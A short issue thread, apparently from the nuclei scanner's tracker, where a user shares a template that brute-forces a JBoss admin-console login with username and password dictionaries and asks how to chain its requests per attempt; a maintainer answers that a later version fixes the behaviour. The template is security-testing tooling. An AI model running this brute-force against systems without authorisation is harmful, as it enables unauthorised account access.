How to implement attacks which more than one request?

[pakkers]

Good afternoon,

I've a problem when I try to run pitchfork or clusterbomb attack in templates which have more than one request, for example to implement bruteforce attack to Jboss login page.
My template is this

requests:
   \- raw:
      \# Req-1
      - |
        GET /admin-console/ HTTP/1.1
        Host: {{Hostname}}
      \# Req-2
      - |
        GET /admin-console/index.seam HTTP/1.1
        Host: {{Hostname}}
      \# Req-3
      - |
        GET /admin-console/secure/summary.seam HTTP/1.1
        Host: {{Hostname}}
      \# Req-4
      - |
        GET /admin-console/login.seam HTTP/1.1
        Host: {{Hostname}}
      \# Req-5
      - |
        POST /admin-console/login.seam HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

login_form=login_form&login_form%3Aname=§user§&login_form%3Apassword=§pass§&login_form%3Asubmit=Login&javax.faces.ViewState={{url_encode('{{JAVAX-FACES}}')}}
    payloads:
      user: dictionaries/users.txt
      pass: dictionaries/passwords.txt
    attack: clusterbomb

    cookie-reuse: true

As a result of running this template, a clusterbomb attack is executed on the first request, when it finishes, another clusterbomb attack is executed on the second request, and so on.
i.e.:

Clusterbomb-1 -> Req-1

Clustermbob-2 -> Req-2
...
Clusterbomb-n -> Req-N

I don't know how to implement this template so that the execution is :

Clusterbomb-1 -> Req-1 -> Req-2 -> ... -> Req-N

I mean as if all requests were a single transaction.

Thanks a lot

[ehsandeep]

Hi @pakkers, this is something that has been fixed in the latest version of the nuclei #1981 and the behaviour you mentioned should be working as expected.